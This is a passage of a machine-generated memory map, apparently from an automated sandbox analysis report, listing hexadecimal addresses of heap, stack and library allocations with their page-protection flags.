page read and write
7FE89906000
trusted library allocation
page read and write
12D4A000
trusted library allocation
page read and write
1A7E0000
heap
page execute and read and write
2EF000
heap
page read and write
361F000
heap
page read and write
3CE000
heap
page read and write
7FE89A30000
trusted library allocation
page execute and read and write
7FE89B70000
trusted library allocation
page read and write
1C381000
heap
page read and write
462A000
heap
page read and write
870000
heap
page read and write
3E3B000
trusted library allocation
page read and write
2C0000
heap
page read and write
4EB000
heap
page read and write
207000
heap
page read and write
640000
heap
page read and write
3853000
heap
page read and write
36D7000
heap
page read and write
4A9000
heap
page read and write
2419000
stack
page read and write
7FE89B30000
trusted library allocation
page read and write
13A000
heap
page read and write
480D000
heap
page read and write
7FE89853000
trusted library allocation
page execute and read and write
7FE89B20000
trusted library allocation
page read and write
36E000
heap
page read and write
7FE899F7000
trusted library allocation
page read and write
3497000
trusted library allocation
page read and write
43D9000
heap
page read and write
37F000
heap
page read and write
285C000
trusted library allocation
page read and write
43D7000
heap
page read and write
41C000
heap
page read and write
42A000
heap
page read and write
167000
heap
page read and write
400000
system
page execute and read and write
1A9D5000
heap
page read and write
4BDC000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
1BD000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
2BB8000
trusted library allocation
page read and write
7FE89864000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
1A5DB000
stack
page read and write
4805000
heap
page read and write
1CA000
heap
page read and write
1C237000
heap
page read and write
291000
heap
page read and write
1A63F000
stack
page read and write
4535000
heap
page read and write
3845000
heap
page read and write
7FE89A50000
trusted library allocation
page execute and read and write
1B450000
heap
page read and write
3812000
heap
page read and write
45F000
heap
page read and write
1AEC0000
heap
page read and write
51C000
heap
page read and write
2C92000
trusted library allocation
page read and write
7FE89B69000
trusted library allocation
page read and write
1C4B000
heap
page read and write
A60000
heap
page read and write
2A13000
trusted library allocation
page read and write
7FE8986B000
trusted library allocation
page read and write
1257F000
trusted library allocation
page read and write
AD0000
heap
page read and write
3A00000
trusted library allocation
page read and write
456000
system
page execute and read and write
3025000
trusted library allocation
page read and write
461A000
heap
page read and write
378000
heap
page read and write
3E3B000
trusted library allocation
page read and write
39F9000
trusted library allocation
page read and write
7FE8985D000
trusted library allocation
page execute and read and write
1B17F000
stack
page read and write
35F000
trusted library allocation
page read and write
1B40000
heap
page read and write
379000
heap
page read and write
2BC000
heap
page read and write
4800000
heap
page read and write
327000
heap
page read and write
38C9000
heap
page read and write
7FE89870000
trusted library allocation
page read and write
408000
heap
page read and write
489000
heap
page read and write
454F000
heap
page read and write
4A4000
heap
page read and write
1C70000
heap
page read and write
123B1000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
356000
heap
page read and write
3930000
trusted library allocation
page read and write
4700000
heap
page read and write
7FE89A07000
trusted library allocation
page read and write
4BE0000
heap
page read and write
4BB9000
heap
page read and write
414000
heap
page read and write
1A82E000
heap
page execute and read and write
2968000
trusted library allocation
page read and write
1A580000
heap
page read and write
466000
heap
page read and write
123D1000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page read and write
47A4000
heap
page read and write
2F0000
heap
page read and write
7FE89A0C000
trusted library allocation
page read and write
22C000
heap
page read and write
2E06000
trusted library allocation
page read and write
35F000
heap
page read and write
3400000
heap
page read and write
305000
heap
page read and write
2FF0000
remote allocation
page read and write
1C4000
heap
page read and write
B7E000
heap
page read and write
34C000
heap
page read and write
283000
heap
page read and write
404000
heap
page read and write
EAE000
stack
page read and write
3E3B000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
1D20000
direct allocation
page read and write
1E3B000
heap
page read and write
7FE89A1C000
trusted library allocation
page read and write
1B2000
heap
page read and write
288000
heap
page read and write
258000
heap
page read and write
430000
heap
page read and write
4541000
heap
page read and write
1F6000
heap
page read and write
7FE89BB4000
trusted library allocation
page read and write
22D000
heap
page read and write
1B154000
heap
page read and write
1A6C0000
heap
page read and write
256000
heap
page read and write
44F4000
heap
page read and write
3951000
heap
page read and write
215000
heap
page read and write
4536000
heap
page read and write
458000
heap
page read and write
1AF8C000
stack
page read and write
36E8000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
3EB000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
1AF000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
3D7000
heap
page read and write
39F9000
trusted library allocation
page read and write
1C0D0000
heap
page read and write
454F000
heap
page read and write
1C232000
heap
page read and write
454D000
heap
page read and write
49A1000
heap
page read and write
1D0000
trusted library allocation
page read and write
135000
stack
page read and write
2772000
trusted library allocation
page read and write
7FE89C33000
trusted library allocation
page read and write
1AB40000
heap
page read and write
BDE000
stack
page read and write
372A000
trusted library allocation
page read and write
39B000
heap
page read and write
1A560000
heap
page read and write
2BC000
stack
page read and write
7FE8985B000
trusted library allocation
page read and write
7FE89A54000
trusted library allocation
page read and write
3683000
heap
page read and write
47D000
heap
page read and write
7FE8984D000
trusted library allocation
page execute and read and write
26AF000
stack
page read and write
434000
heap
page read and write
27C000
stack
page read and write
1AEF6000
heap
page read and write
2CFE000
stack
page read and write
482000
heap
page read and write
39B000
heap
page read and write
3E3B000
trusted library allocation
page read and write
1BB0000
heap
page read and write
1A4000
heap
page read and write
2B8000
heap
page read and write
2F0000
heap
page read and write
1A941000
heap
page read and write
4BE0000
heap
page read and write
391000
heap
page read and write
4E69000
heap
page read and write
1B26F000
stack
page read and write
44BA000
heap
page read and write
1A4ED000
stack
page read and write
2E28000
trusted library allocation
page read and write
279F000
stack
page read and write
38D4000
heap
page read and write
46A1000
heap
page read and write
1B90000
trusted library allocation
page read and write
2B8000
heap
page read and write
3770000
trusted library allocation
page read and write
24C000
heap
page read and write
5C0000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
1BB000
heap
page read and write
1C243000
heap
page read and write
451000
heap
page read and write
1C1CC000
heap
page read and write
180000
heap
page read and write
3E3B000
trusted library allocation
page read and write
37A000
heap
page read and write
36E000
heap
page read and write
8F3000
heap
page read and write
1AB5C000
heap
page read and write
50A000
heap
page read and write
3704000
heap
page read and write
51A000
heap
page read and write
3B0E000
stack
page read and write
364E000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
4A4000
heap
page read and write
337000
heap
page read and write
1AC39000
heap
page read and write
1C23B000
heap
page read and write
323E000
stack
page read and write
3682000
heap
page read and write
7FE8985D000
trusted library allocation
page execute and read and write
4627000
heap
page read and write
2C34000
trusted library allocation
page read and write
46C4000
heap
page read and write
4A9000
heap
page read and write
25B000
heap
page read and write
41F000
heap
page read and write
2C85000
trusted library allocation
page read and write
4EC000
heap
page read and write
32AA000
trusted library allocation
page read and write
311E000
stack
page read and write
28C000
heap
page read and write
288000
heap
page read and write
7FE89A00000
trusted library allocation
page execute and read and write
2788000
trusted library allocation
page read and write
5175000
heap
page read and write
160000
heap
page read and write
4A3A000
heap
page read and write
256000
heap
page read and write
1B370000
heap
page read and write
576000
heap
page read and write
1A81E000
stack
page read and write
4700000
heap
page read and write
2C4000
heap
page read and write
1BFBE000
stack
page read and write
7FE89C15000
trusted library allocation
page read and write
1D8000
heap
page read and write
461A000
heap
page read and write
23E000
heap
page read and write
1DD7000
direct allocation
page read and write
384000
heap
page read and write
39B0000
trusted library allocation
page read and write
3298000
trusted library allocation
page read and write
3F5B000
heap
page read and write
3624000
heap
page read and write
7FE89883000
trusted library allocation
page read and write
381000
heap
page read and write
452E000
heap
page read and write
34A0000
heap
page read and write
2180000
heap
page execute and read and write
4BD7000
heap
page read and write
1C22E000
stack
page read and write
3750000
heap
page read and write
7FE89860000
trusted library allocation
page read and write
4BE0000
heap
page read and write
B81000
heap
page read and write
7FE89900000
trusted library allocation
page read and write
22F000
heap
page read and write
1BF65000
heap
page read and write
7FE89A10000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
379F000
heap
page read and write
1DFE000
stack
page read and write
1E13000
direct allocation
page read and write
2C0000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
22A1000
trusted library allocation
page read and write
1CA7000
direct allocation
page read and write
4684000
heap
page read and write
43D9000
heap
page read and write
22F000
heap
page read and write
38C9000
heap
page read and write
7FE89A60000
trusted library allocation
page read and write
1DA0000
heap
page read and write
37FB000
trusted library allocation
page read and write
1A8A6000
heap
page read and write
484000
heap
page read and write
12B8F000
trusted library allocation
page read and write
44EB000
heap
page read and write
1C9BC000
stack
page read and write
3853000
heap
page read and write
4BE8000
heap
page read and write
2341000
trusted library allocation
page read and write
3497000
trusted library allocation
page read and write
274000
heap
page read and write
A0000
heap
page read and write
329F000
trusted library allocation
page read and write
4545000
heap
page read and write
22F000
heap
page read and write
426000
heap
page read and write
364E000
heap
page read and write
390000
heap
page read and write
4EF000
heap
page read and write
3BA000
heap
page read and write
32A7000
trusted library allocation
page read and write
2F8000
heap
page read and write
2A0000
heap
page read and write
2FEE000
stack
page read and write
1A7BF000
stack
page read and write
34C000
heap
page read and write
2CBF000
stack
page read and write
1ACF0000
heap
page read and write
3E3B000
trusted library allocation
page read and write
1C8B0000
heap
page read and write
385A000
heap
page read and write
20000
heap
page read and write
1CA0000
direct allocation
page read and write
3E00000
heap
page read and write
1C450000
heap
page read and write
444000
heap
page read and write
1A56B000
heap
page read and write
1A910000
heap
page read and write
7FE89A02000
trusted library allocation
page read and write
17E000
stack
page read and write
4545000
heap
page read and write
3C6000
heap
page read and write
4637000
heap
page read and write
400000
heap
page read and write
980000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
1AB48000
heap
page read and write
210000
heap
page read and write
473000
system
page execute and read and write
3870000
trusted library allocation
page execute
361000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
330000
heap
page read and write
AC0000
heap
page read and write
3B50000
trusted library allocation
page read and write
2E6000
heap
page read and write
1AE0000
trusted library allocation
page read and write
220000
heap
page read and write
31F000
heap
page read and write
2755000
trusted library allocation
page read and write
50B000
heap
page read and write
4BE2000
heap
page read and write
7B7000
heap
page read and write
1EF000
trusted library allocation
page read and write
2EB9000
heap
page read and write
1C341000
heap
page read and write
47E000
heap
page read and write
4351000
heap
page read and write
1E0E000
heap
page execute and read and write
7FE89AB0000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
40B000
heap
page read and write
1BC0000
heap
page read and write
329E000
trusted library allocation
page read and write
400000
heap
page read and write
3E3B000
trusted library allocation
page read and write
7FE8990C000
trusted library allocation
page execute and read and write
2FE000
heap
page read and write
2771000
trusted library allocation
page read and write
3626000
heap
page read and write
27D6000
trusted library allocation
page read and write
32AA000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
1A559000
stack
page read and write
2BAC000
stack
page read and write
48BF000
heap
page read and write
7FE89874000
trusted library allocation
page read and write
221000
heap
page read and write
2700000
heap
page read and write
3A9000
heap
page read and write
2344000
heap
page read and write
347C000
stack
page read and write
515000
heap
page read and write
7FE89880000
trusted library allocation
page read and write
1C7000
heap
page read and write
430000
heap
page read and write
3E3B000
trusted library allocation
page read and write
3497000
trusted library allocation
page read and write
3295000
trusted library allocation
page read and write
256000
heap
page read and write
3688000
heap
page read and write
509000
heap
page read and write
51C000
heap
page read and write
28CB000
stack
page read and write
3EF000
heap
page read and write
1C50000
heap
page read and write
1B40C000
stack
page read and write
400000
system
page execute and read and write
47E000
heap
page read and write
7FE89863000
trusted library allocation
page read and write
4CA0000
trusted library allocation
page read and write
A8000
heap
page read and write
23F9000
trusted library allocation
page read and write
1C0000
heap
page read and write
23B8000
trusted library allocation
page read and write
44F0000
heap
page read and write
3624000
heap
page read and write
4545000
heap
page read and write
31F000
heap
page read and write
454A000
heap
page read and write
133A7000
trusted library allocation
page read and write
12391000
trusted library allocation
page read and write
1DD7000
direct allocation
page read and write
3DF000
heap
page read and write
39F9000
trusted library allocation
page read and write
2C8F000
trusted library allocation
page read and write
26C000
stack
page read and write
7FE89AD0000
trusted library allocation
page read and write
1A717000
heap
page read and write
406000
heap
page read and write
33B0000
trusted library allocation
page read and write
43F000
heap
page read and write
4618000
heap
page read and write
2C4000
heap
page read and write
2FD000
heap
page read and write
32AE000
trusted library allocation
page read and write
46E0000
heap
page read and write
7FE89852000
trusted library allocation
page read and write
45F000
heap
page read and write
1FE6000
heap
page read and write
7FE89860000
trusted library allocation
page read and write
4BD4000
heap
page read and write
10000000
direct allocation
page read and write
7FE89854000
trusted library allocation
page read and write
473C000
heap
page read and write
385000
heap
page read and write
2E4E000
stack
page read and write
122FF000
trusted library allocation
page read and write
39B0000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
34A000
heap
page read and write
1A77E000
stack
page read and write
1B76000
heap
page read and write
7FE89C20000
trusted library allocation
page read and write
4780000
heap
page read and write
1A5DE000
heap
page read and write
1C6CD000
stack
page read and write
7FE89B00000
trusted library allocation
page read and write
1A61D000
stack
page read and write
7FE89A68000
trusted library allocation
page read and write
1B2000
stack
page read and write
7FE89AA0000
trusted library allocation
page read and write
2B4000
heap
page read and write
1C640000
trusted library section
page read and write
308000
heap
page read and write
3B3000
heap
page read and write
1BA4000
heap
page read and write
46A1000
heap
page read and write
4A0000
heap
page read and write
474000
remote allocation
page execute and read and write
50A000
heap
page read and write
429000
heap
page read and write
3DE000
stack
page read and write
47A4000
heap
page read and write
3E3B000
trusted library allocation
page read and write
229000
heap
page read and write
2C95000
trusted library allocation
page read and write
1A9CE000
stack
page read and write
1AA000
heap
page read and write
484000
heap
page read and write
2C89000
trusted library allocation
page read and write
4BB7000
heap
page read and write
7FE89A17000
trusted library allocation
page read and write
1C22C000
heap
page read and write
2370000
heap
page execute and read and write
20000
heap
page read and write
3BE000
heap
page read and write
7FE89970000
trusted library allocation
page execute and read and write
1A65D000
stack
page read and write
310000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
27C000
heap
page read and write
4634000
heap
page read and write
1C55F000
stack
page read and write
330000
heap
page read and write
10000
heap
page read and write
223C000
stack
page read and write
34A000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
10000
heap
page read and write
250000
heap
page read and write
49B000
heap
page read and write
3B10000
heap
page read and write
2C92000
trusted library allocation
page read and write
51C000
heap
page read and write
270000
heap
page read and write
4806000
heap
page read and write
4CA0000
trusted library allocation
page read and write
1A62E000
heap
page execute and read and write
321000
heap
page read and write
278000
heap
page read and write
4420000
trusted library allocation
page read and write
303F000
trusted library allocation
page read and write
4683000
heap
page read and write
3626000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
7FE89A32000
trusted library allocation
page read and write
7FE89A30000
trusted library allocation
page execute and read and write
1AE48000
stack
page read and write
3330000
trusted library allocation
page read and write
1B40000
trusted library allocation
page read and write
4533000
heap
page read and write
3B8000
heap
page read and write
1B07B000
stack
page read and write
313000
heap
page read and write
2BE000
heap
page read and write
F5D000
stack
page read and write
12401000
trusted library allocation
page read and write
1AB39000
heap
page read and write
1A728000
stack
page read and write
46C4000
heap
page read and write
13FB1000
trusted library allocation
page read and write
39F9000
trusted library allocation
page read and write
45C000
system
page execute and read and write
1C1DF000
heap
page read and write
3A05000
trusted library allocation
page read and write
3C1000
heap
page read and write
1AF4E000
stack
page read and write
37D8000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
7FE89910000
trusted library allocation
page read and write
1D80000
direct allocation
page read and write
123000
stack
page read and write
4A00000
heap
page read and write
1C384000
heap
page read and write
2D2000
heap
page read and write
4A3A000
heap
page read and write
2270000
heap
page execute and read and write
660000
heap
page read and write
44F9000
heap
page read and write
4CF000
heap
page read and write
313000
heap
page read and write
3CA000
heap
page read and write
14D8D000
trusted library allocation
page read and write
400000
heap
page read and write
1C336000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
467B000
heap
page read and write
44EA000
heap
page read and write
2554000
heap
page read and write
1A708000
stack
page read and write
30A000
heap
page read and write
7FE89BB9000
trusted library allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
AF9000
heap
page read and write
7FE89910000
trusted library allocation
page execute and read and write
2E00000
trusted library allocation
page read and write
3480000
trusted library allocation
page read and write
3729000
heap
page read and write
20000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
1AE000
heap
page read and write
3950000
heap
page read and write
1BC4000
heap
page read and write
4BB1000
heap
page read and write
BCE000
stack
page read and write
27D000
heap
page read and write
3009000
trusted library allocation
page read and write
3D2000
heap
page read and write
40A000
heap
page read and write
7FE89BCA000
trusted library allocation
page read and write
2C87000
trusted library allocation
page read and write
1AB5A000
heap
page read and write
24C000
heap
page read and write
452B000
heap
page read and write
7FE898F0000
trusted library allocation
page read and write
2A0000
heap
page read and write
20000
heap
page read and write
28AE000
trusted library allocation
page read and write
386F000
heap
page read and write
23DE000
trusted library allocation
page read and write
7FE89A03000
trusted library allocation
page read and write
293000
heap
page read and write
2C8D000
trusted library allocation
page read and write
1C170000
heap
page read and write
1A5F4000
heap
page execute and read and write
7FE89AF0000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page read and write
F30000
heap
page read and write
1C318000
heap
page read and write
7B0000
heap
page read and write
19E000
heap
page read and write
1DD4000
heap
page read and write
2F6D000
stack
page read and write
10000
heap
page read and write
2941000
trusted library allocation
page read and write
425E000
stack
page read and write
7FE89B00000
trusted library allocation
page read and write
366E000
heap
page read and write
2A00000
trusted library allocation
page read and write
50D000
heap
page read and write
2AE000
stack
page read and write
7FE89970000
trusted library allocation
page execute and read and write
366E000
heap
page read and write
2E0000
trusted library allocation
page read and write
7FE89A0C000
trusted library allocation
page read and write
454F000
heap
page read and write
408000
heap
page read and write
7FE89A34000
trusted library allocation
page read and write
1C910000
heap
page read and write
515000
heap
page read and write
3CE000
stack
page read and write
1A0000
heap
page read and write
4E60000
heap
page read and write
1C5C0000
heap
page read and write
1AC10000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
1B3AF000
stack
page read and write
4416000
heap
page read and write
1AECF000
stack
page read and write
1B188000
heap
page read and write
243000
heap
page read and write
3497000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
51C000
heap
page read and write
1DC0000
direct allocation
page read and write
3812000
heap
page read and write
19C000
stack
page read and write
1B80000
trusted library allocation
page read and write
122F1000
trusted library allocation
page read and write
2C36000
trusted library allocation
page read and write
7FE89BE8000
trusted library allocation
page read and write
2571000
trusted library allocation
page read and write
524000
heap
page read and write
44FB000
heap
page read and write
3B0000
heap
page read and write
700000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
1B11F000
stack
page read and write
2400000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
358000
heap
page read and write
27BF000
stack
page read and write
43D9000
heap
page read and write
350000
trusted library allocation
page read and write
2436000
heap
page read and write
123FF000
trusted library allocation
page read and write
1D00000
direct allocation
page read and write
7FE89970000
trusted library allocation
page execute and read and write
7FE89A48000
trusted library allocation
page read and write
40B000
heap
page read and write
1B04F000
stack
page read and write
1A7C8000
stack
page read and write
39D000
heap
page read and write
7FE8990C000
trusted library allocation
page execute and read and write
32A5000
trusted library allocation
page read and write
1C153000
heap
page read and write
12568000
trusted library allocation
page read and write
7FE89870000
trusted library allocation
page read and write
2C3A000
trusted library allocation
page read and write
2FF0000
remote allocation
page read and write
473A000
heap
page read and write
2C5000
heap
page read and write
474000
heap
page read and write
37F000
heap
page read and write
7FE89A64000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
22F1000
trusted library allocation
page read and write
2EF0000
heap
page read and write
3856000
heap
page read and write
12D9D000
trusted library allocation
page read and write
5E0000
heap
page read and write
256F000
stack
page read and write
8E5000
heap
page read and write
40B000
heap
page read and write
8A5000
heap
page read and write
366E000
heap
page read and write
2B50000
heap
page read and write
37A8000
heap
page read and write
1ABDA000
heap
page read and write
450000
heap
page read and write
20000
heap
page read and write
40B000
heap
page read and write
32A000
heap
page read and write
380D000
heap
page read and write
3AF000
heap
page read and write
1C2FF000
stack
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
7FE89843000
trusted library allocation
page execute and read and write
49E0000
heap
page read and write
8E2000
heap
page read and write
4616000
heap
page read and write
38F000
stack
page read and write
7FE89862000
trusted library allocation
page read and write
2C86000
trusted library allocation
page read and write
3A05000
trusted library allocation
page read and write
20000
heap
page read and write
37E6000
heap
page read and write
E3000
stack
page read and write
1CE000
heap
page read and write
2C83000
trusted library allocation
page read and write
28C000
heap
page read and write
4414000
heap
page read and write
1A5D2000
heap
page read and write
3B50000
trusted library allocation
page read and write
7FE89A58000
trusted library allocation
page read and write
25C2000
trusted library allocation
page read and write
25F000
heap
page read and write
7FE8985D000
trusted library allocation
page execute and read and write
1A890000
heap
page read and write
1B0000
trusted library allocation
page read and write
4543000
heap
page read and write
4545000
heap
page read and write
368000
heap
page read and write
8CF000
heap
page read and write
4BEA000
heap
page read and write
46C5000
heap
page read and write
2C8A000
trusted library allocation
page read and write
2C36000
trusted library allocation
page read and write
1AE7E000
stack
page read and write
1B10000
trusted library allocation
page read and write
1AF000
heap
page read and write
1C06D000
stack
page read and write
366000
heap
page read and write
293D000
trusted library allocation
page read and write
3AE000
heap
page read and write
1C18D000
heap
page read and write
1A4E4000
heap
page execute and read and write
24F0000
heap
page execute and read and write
7FE899E2000
trusted library allocation
page read and write
470000
heap
page read and write
3855000
heap
page read and write
1D60000
direct allocation
page read and write
7FE89A07000
trusted library allocation
page read and write
35F0000
heap
page read and write
3A00000
trusted library allocation
page read and write
1BA0000
heap
page read and write
1B15F000
stack
page read and write
1CADF000
stack
page read and write
50D000
heap
page read and write
7FE89BF4000
trusted library allocation
page read and write
314000
heap
page read and write
134000
heap
page read and write
337000
heap
page read and write
7FE89A27000
trusted library allocation
page read and write
4CA0000
trusted library allocation
page read and write
385F000
heap
page read and write
352000
heap
page read and write
330000
heap
page read and write
AEE000
heap
page read and write
46E0000
heap
page read and write
3A05000
trusted library allocation
page read and write
1B3DC000
stack
page read and write
1A978000
stack
page read and write
3E3B000
trusted library allocation
page read and write
350000
heap
page read and write
614000
heap
page read and write
A68000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
1C25C000
heap
page read and write
1AEBF000
stack
page read and write
7FE89B60000
trusted library allocation
page read and write
44F5000
heap
page read and write
3497000
trusted library allocation
page read and write
7FE8991C000
trusted library allocation
page execute and read and write
1AED0000
heap
page read and write
7FE89A07000
trusted library allocation
page read and write
534000
heap
page read and write
2220000
heap
page execute and read and write
1C53B000
stack
page read and write
1C600000
heap
page read and write
40B000
heap
page read and write
1AB82000
heap
page read and write
1C353000
heap
page read and write
10000
heap
page read and write
461E000
heap
page read and write
39F000
heap
page read and write
1C0AF000
stack
page read and write
19F000
heap
page read and write
122B0000
trusted library allocation
page read and write
8C0000
heap
page read and write
3DC0000
heap
page read and write
14C4B000
trusted library allocation
page read and write
3A00000
trusted library allocation
page read and write
3786000
heap
page read and write
1CFCF000
stack
page read and write
386F000
heap
page read and write
32A1000
trusted library allocation
page read and write
268000
heap
page read and write
453A000
heap
page read and write
1C0EE000
stack
page read and write
2FF000
trusted library allocation
page read and write
4EF000
heap
page read and write
1C46E000
stack
page read and write
1C1E1000
heap
page read and write
4FA000
heap
page read and write
2D0000
heap
page read and write
7FE89A03000
trusted library allocation
page read and write
19B000
stack
page read and write
35F8000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
1CB0F000
stack
page read and write
7FE89A42000
trusted library allocation
page read and write
4F0000
direct allocation
page read and write
1C8000
heap
page read and write
12581000
trusted library allocation
page read and write
1B28E000
stack
page read and write
459000
system
page execute and read and write
1C88F000
stack
page read and write
51A000
heap
page read and write
366000
heap
page read and write
220000
heap
page read and write
3035000
trusted library allocation
page read and write
7FE89980000
trusted library allocation
page execute and read and write
329A000
trusted library allocation
page read and write
21B0000
heap
page read and write
364000
heap
page read and write
4420000
trusted library allocation
page read and write
23A1000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
38D000
heap
page read and write
4543000
heap
page read and write
3497000
trusted library allocation
page read and write
42A000
heap
page read and write
4545000
heap
page read and write
1A566000
heap
page read and write
7FE89BC1000
trusted library allocation
page read and write
1C6B0000
heap
page read and write
877000
heap
page read and write
1C369000
heap
page read and write
454D000
heap
page read and write
44C1000
heap
page read and write
25D000
heap
page read and write
3BE000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
408000
heap
page read and write
1C81A000
stack
page read and write
225000
heap
page read and write
92A000
heap
page read and write
44B3000
heap
page read and write
414000
heap
page read and write
7FE899F0000
trusted library allocation
page read and write
1A7F8000
heap
page execute and read and write
1ADAE000
stack
page read and write
1AADF000
stack
page read and write
454D000
heap
page read and write
1E0000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
448000
heap
page read and write
160000
heap
page read and write
3E3B000
trusted library allocation
page read and write
3AD000
heap
page read and write
3F0000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
49A1000
heap
page read and write
2C0000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
7FE8986B000
trusted library allocation
page read and write
37E6000
heap
page read and write
500000
heap
page read and write
454D000
heap
page read and write
383D000
heap
page read and write
4545000
heap
page read and write
329E000
trusted library allocation
page read and write
1C1BF000
heap
page read and write
37A8000
heap
page read and write
223E000
stack
page read and write
1E00000
heap
page read and write
123ED000
trusted library allocation
page read and write
2C70000
remote allocation
page read and write
3729000
heap
page read and write
4537000
heap
page read and write
1AED4000
heap
page read and write
48BF000
heap
page read and write
1C33E000
heap
page read and write
530000
heap
page read and write
4A1000
heap
page read and write
2C3000
heap
page read and write
3621000
heap
page read and write
170000
heap
page read and write
3E3B000
trusted library allocation
page read and write
1B76000
heap
page read and write
4538000
heap
page read and write
2C32000
trusted library allocation
page read and write
463C000
heap
page read and write
10001000
direct allocation
page execute and read and write
123A1000
trusted library allocation
page read and write
28C000
heap
page read and write
3E7000
heap
page read and write
1B180000
heap
page read and write
1C5EF000
stack
page read and write
3A05000
trusted library allocation
page read and write
40B000
heap
page read and write
308000
heap
page read and write
4616000
heap
page read and write
12301000
trusted library allocation
page read and write
413000
heap
page read and write
3E7E000
stack
page read and write
370000
heap
page read and write
4CF000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
41AC000
stack
page read and write
7FE89A20000
trusted library allocation
page execute and read and write
1233D000
trusted library allocation
page read and write
353000
heap
page read and write
453C000
heap
page read and write
44B8000
heap
page read and write
1C1AB000
heap
page read and write
2B5000
heap
page read and write
400000
heap
page read and write
B6E000
heap
page read and write
366E000
heap
page read and write
40FF000
stack
page read and write
1A2F0000
heap
page read and write
364E000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
7FE89AF0000
trusted library allocation
page read and write
2C8B000
trusted library allocation
page read and write
34E000
heap
page read and write
337000
heap
page read and write
1D60000
direct allocation
page read and write
370000
heap
page read and write
284B000
trusted library allocation
page read and write
B83000
heap
page read and write
B4E000
stack
page read and write
7FE89A60000
trusted library allocation
page read and write
7FE89B45000
trusted library allocation
page read and write
3A05000
trusted library allocation
page read and write
48BF000
heap
page read and write
2EC000
heap
page read and write
2340000
heap
page read and write
3E3B000
trusted library allocation
page read and write
71E000
heap
page read and write
51A000
heap
page read and write
236F000
stack
page read and write
DEF000
stack
page read and write
382E000
heap
page read and write
1C296000
heap
page read and write
7FE89900000
trusted library allocation
page execute and read and write
35FC000
heap
page read and write
25F4000
trusted library allocation
page read and write
3EB000
heap
page read and write
1A6B9000
stack
page read and write
4630000
heap
page read and write
3A8000
heap
page read and write
39F9000
trusted library allocation
page read and write
507000
heap
page read and write
473B000
heap
page read and write
1A654000
heap
page execute and read and write
492000
heap
page read and write
356000
heap
page read and write
4496000
heap
page read and write
7FE89936000
trusted library allocation
page execute and read and write
3BE000
heap
page read and write
46A1000
heap
page read and write
293000
heap
page read and write
44BA000
heap
page read and write
48A0000
heap
page read and write
1DD4000
heap
page execute and read and write
149CD000
trusted library allocation
page read and write
1BE6000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
3E0000
heap
page read and write
4CF000
heap
page read and write
40B000
heap
page read and write
39F9000
trusted library allocation
page read and write
1A6C6000
heap
page read and write
408000
heap
page read and write
1C1CB000
heap
page read and write
41C000
heap
page read and write
1C200000
heap
page read and write
1AAE0000
heap
page read and write
34A000
heap
page read and write
454D000
heap
page read and write
1B1CC000
stack
page read and write
3843000
heap
page read and write
354000
heap
page read and write
3B0000
heap
page read and write
41F000
system
page execute and read and write
430000
heap
page read and write
3A00000
trusted library allocation
page read and write
46A0000
heap
page read and write
3853000
heap
page read and write
1C710000
heap
page read and write
3D90000
trusted library allocation
page read and write
3858000
heap
page read and write
7FE89B40000
trusted library allocation
page read and write
2860000
trusted library allocation
page execute read
7FE89AC0000
trusted library allocation
page read and write
454000
heap
page read and write
454F000
heap
page read and write
2E04000
trusted library allocation
page read and write
358000
heap
page read and write
170000
heap
page read and write
7FE89A23000
trusted library allocation
page read and write
36E0000
heap
page read and write
2FA000
heap
page read and write
4545000
heap
page read and write
473A000
heap
page read and write
40B000
heap
page read and write
500000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
453C000
heap
page read and write
3E3B000
trusted library allocation
page read and write
39A000
heap
page read and write
256000
heap
page read and write
39F9000
trusted library allocation
page read and write
297F000
stack
page read and write
7FE89A80000
trusted library allocation
page read and write
EE0000
heap
page read and write
4612000
heap
page read and write
4590000
heap
page read and write
26BC000
trusted library allocation
page read and write
4CF000
heap
page read and write
3E3B000
trusted library allocation
page read and write
1AF5F000
stack
page read and write
1E05000
heap
page read and write
1C1F0000
heap
page read and write
3EE000
heap
page read and write
3626000
heap
page read and write
7FE89936000
trusted library allocation
page execute and read and write
880000
heap
page read and write
4537000
heap
page read and write
283000
heap
page read and write
302E000
stack
page read and write
1DE000
heap
page read and write
280E000
trusted library allocation
page read and write
7FE898BC000
